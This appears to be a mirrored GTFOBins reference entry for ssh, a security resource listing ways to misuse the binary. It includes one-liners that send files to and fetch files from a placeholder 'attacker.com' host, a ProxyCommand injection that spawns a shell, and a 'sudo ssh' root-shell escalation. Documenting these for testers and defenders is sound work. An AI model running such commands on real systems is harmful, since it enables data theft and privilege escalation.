mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-15 00:01:45 +01:00
8eaf595fe6
Here the trick is to restore those file descriptors (0, 1, 2) that have been redirected (`dup2`) by the parent process. First we need to determine which one has been redirected, for example by looking at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0, 1 or 2 respectively, where `x` is any file descriptor number that points to the TTY. It may happen that no file descriptor is unchanged, in that case we can use `tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty)
31 lines
1002 B
Markdown
31 lines
1002 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- description: Reconnecting may help bypassing restricted shells.
|
|
code: ssh localhost $SHELL --noprofile --norc
|
|
- description: Spawn interactive shell through ProxyCommand option.
|
|
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
|
upload:
|
|
- description: Send local file to a SSH server.
|
|
code: |
|
|
HOST=user@attacker.com
|
|
RPATH=file_to_save
|
|
LPATH=file_to_send
|
|
ssh $HOST "cat > $RPATH" < $LPATH
|
|
download:
|
|
- description: Fetch a remote file from a SSH server.
|
|
code: |
|
|
HOST=user@attacker.com
|
|
RPATH=file_to_get
|
|
LPATH=file_to_save
|
|
ssh $HOST "cat $RPATH" > $LPATH
|
|
file-read:
|
|
- description: The read file content is corrupted by error prints.
|
|
code: |
|
|
LFILE=file_to_read
|
|
ssh -F $LFILE localhost
|
|
sudo-enabled:
|
|
- description: Spawn interactive root shell through ProxyCommand option.
|
|
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
|
---
|